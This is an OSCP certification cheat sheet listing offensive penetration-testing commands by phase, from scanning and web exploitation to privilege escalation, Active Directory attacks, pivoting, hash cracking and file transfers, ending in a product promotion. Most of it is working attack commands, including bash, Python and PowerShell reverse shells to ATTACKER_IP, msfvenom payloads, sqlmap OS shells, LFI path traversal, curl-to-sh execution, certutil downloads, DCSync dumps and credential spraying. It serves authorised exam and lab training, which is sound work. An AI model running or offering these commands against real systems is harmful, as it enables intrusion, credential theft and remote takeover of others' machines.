# Enumeration
Enumeration is everything in the OSCP. Spend 80% of your time here. Scan all ports, enumerate all services.
Nmap — Full Scan Strategy
nmap -p- --min-rate=1000 -T4 TARGET_IP -oN ports.txt
Step 1: Fast full TCP port scan to discover all open ports
nmap -p OPEN_PORTS -sC -sV -oA detailed TARGET_IP
Step 2: Targeted scan with scripts + version detection on discovered ports
nmap -sU --top-ports 200 --min-rate=1000 TARGET_IP
Don't forget UDP! Scan top 200 UDP ports
Web Enumeration
feroxbuster -u http://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt,bak -t 50
Directory brute-force with common extensions (php, txt, bak are OSCP gold)
whatweb http://TARGET && curl -s http://TARGET -I
Identify web technologies and server headers
nikto -h http://TARGET -C all
Web vulnerability scanner — finds misconfigs, default files
SMB Enumeration
smbclient -N -L //TARGET
List SMB shares with null session (no password)
enum4linux-ng -A TARGET
Full SMB/RPC enumeration — users, shares, groups, password policy
crackmapexec smb TARGET -u '' -p '' --shares
Enumerate readable shares with CrackMapExec
SNMP, LDAP, DNS
snmpwalk -v2c -c public TARGET 1.3.6.1.2.1
SNMP walk with community string "public" — can leak usernames, processes
ldapsearch -H ldap://TARGET -x -b "DC=domain,DC=local" -s sub "(objectClass=user)" sAMAccountName
Anonymous LDAP query to enumerate domain users
dig axfr @TARGET DOMAIN.LOCAL
Attempt DNS zone transfer
# Web Exploitation
SQL injection, file upload bypass, command injection — the bread and butter of OSCP web boxes.
SQL Injection
sqlmap -u "http://TARGET/page?id=1" --batch --dbs
Automated SQLi detection — enumerate databases
sqlmap -r request.txt --batch --level 5 --risk 3 --os-shell
SQLi from Burp request — get an OS shell if possible
File Upload Bypass
cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg
Double extension bypass — upload as .php.jpg
Command Injection
; whoami
Basic command injection test (also try | whoami, `whoami`, $(whoami))
Local/Remote File Inclusion
curl "http://TARGET/page?file=../../../etc/passwd"
LFI — read /etc/passwd via path traversal
curl "http://TARGET/page?file=php://filter/convert.base64-encode/resource=config.php"
PHP filter wrapper — read source code as base64
# Shells & Payloads
Reverse shells, bind shells, and payload generation — know these by heart for the exam.
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Bash reverse shell — the classic
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Python3 reverse shell
powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('ATTACKER_IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII.GetBytes($r)),0,$r.Length)}"
PowerShell reverse shell — for Windows targets
Shell Upgrade
python3 -c 'import pty;pty.spawn("/bin/bash")'
Step 1: Spawn a PTY shell
export TERM=xterm && stty raw -echo; fg
Step 2: Full interactive TTY (Ctrl+Z first, then run this)
Msfvenom Payloads
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o shell.exe
Windows x64 reverse shell EXE
msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
Linux x64 reverse shell ELF binary
# Linux Privilege Escalation
The OSCP loves Linux privesc. Check SUID, capabilities, cron jobs, writable paths, kernel version.
💡 OSCP Tip: Always run LinPEAS first. Then manually check the findings.
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Run LinPEAS directly — highlights privesc vectors in color
find / -perm -4000 -type f 2>/dev/null
Find all SUID binaries — check each on GTFOBins
sudo -l
Check what you can run as root — the #1 privesc vector
getcap -r / 2>/dev/null
Find binaries with capabilities (cap_setuid = instant root)
cat /etc/crontab && ls -la /etc/cron*
Check cron jobs — writable scripts run as root?
find / -writable -type f 2>/dev/null | grep -v proc
Find world-writable files — potential for path hijacking
uname -a && cat /etc/os-release
Check kernel version — search for kernel exploits
# Windows Privilege Escalation
Services, tokens, AlwaysInstallElevated, unquoted service paths, potatoes — the OSCP classics.
💡 OSCP Tip: Run WinPEAS + PowerUp.ps1 — together they catch most vectors.
.\winPEASx64.exe
WinPEAS — automated Windows privilege escalation check
powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"
PowerUp — finds misconfigurations, weak permissions, unquoted paths
whoami /priv
Check current token privileges — SeImpersonate? SeBackup?
.\GodPotato.exe -cmd "cmd /c whoami"
GodPotato — instant SYSTEM from SeImpersonatePrivilege (works on modern Windows)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Check AlwaysInstallElevated — if 1, generate MSI payload for SYSTEM
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows"
Find unquoted service paths — potential for binary hijacking
# Active Directory
AD is a major part of the OSCP after the 2023 update. Kerberoasting, AS-REP roasting, DCSync, and lateral movement.
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP
BloodHound collection — map the entire AD attack paths
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
Kerberoasting — extract service ticket hashes for offline cracking
impacket-GetNPUsers domain.local/ -no-pass -usersfile users.txt -dc-ip DC_IP
AS-REP Roasting — find accounts without Kerberos pre-auth
impacket-psexec domain.local/ADMIN:PASS@TARGET_IP
PsExec — get SYSTEM shell with valid admin credentials
impacket-secretsdump domain.local/ADMIN:PASS@DC_IP
DCSync — dump all domain hashes (requires DA or replication rights)
evil-winrm -i TARGET_IP -u USER -p PASS
WinRM shell — works when port 5985 is open
crackmapexec smb SUBNET/24 -u USER -p PASS --shares
Spray creds across the network — find where you can access
# Pivoting & Tunneling
Reach internal networks through compromised hosts. Chisel, SSH tunnels, ligolo — must-know for OSCP.
Chisel (Recommended)
./chisel server -p 8080 --reverse
On your Kali: start Chisel server in reverse mode
./chisel client ATTACKER_IP:8080 R:socks
On target: connect back, creates SOCKS5 proxy on Kali port 1080
proxychains4 nmap -sT -Pn -p 445,3389,5985 INTERNAL_IP
Scan internal network through the SOCKS proxy
SSH Tunneling
ssh -L 8080:INTERNAL_IP:80 user@PIVOT_IP
Local port forward — access internal web on localhost:8080
ssh -D 1080 user@PIVOT_IP
Dynamic SOCKS proxy through SSH — use with proxychains
# Password Attacks
Cracking hashes, brute-forcing logins — hashcat and John are your best friends.
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force
Crack Kerberoast hashes (TGS-REP type 23)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force
Crack AS-REP roast hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
John the Ripper — auto-detect hash type and crack
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"
Brute-force web login with Hydra
# File Transfers
Get tools onto the target and exfil data back. Multiple methods for different situations.
Linux Targets
python3 -m http.server 8000
On Kali: start HTTP server to serve files
wget http://ATTACKER_IP:8000/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh
On target: download and make executable
Windows Targets
certutil -urlcache -split -f http://ATTACKER_IP:8000/shell.exe C:\Windows\Temp\shell.exe
Certutil download — works on most Windows versions
powershell -c "(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP:8000/shell.exe','C:\Windows\Temp\shell.exe')"
PowerShell download — alternative to certutil
# OSCP Exam Tips
Strategy and mindset for the 23h45 exam. These tips come from hundreds of OSCP experiences.
⏱️ Time management: Don't spend more than 2 hours on a single machine. If stuck, move on and come back later with fresh eyes.
📝 Document everything: Screenshot every step as you go. Don't leave reporting for the end — paste evidence into your report template during the exam.
🎯 Start with the easy boxes: The standalone machines (non-AD) are often quicker to root. Secure those points first.
🔁 Enumerate deeper: If you're stuck, you haven't enumerated enough. Re-run scans with different wordlists, check all ports again, look at source code.
🏠 AD set = 40 points: The AD chain is the biggest point block. Practice AD boxes on HackTheBox and TryHackMe before the exam.
💤 Take breaks: Sleep 2-4 hours during the exam. Coming back rested often leads to solving what you were stuck on.
Want all 11,600+ commands?
This cheatsheet is just the surface. Pentest Mindmap organizes 11,600+ commands in 32 categories with instant search and one-click copy.
Try free for 7 days →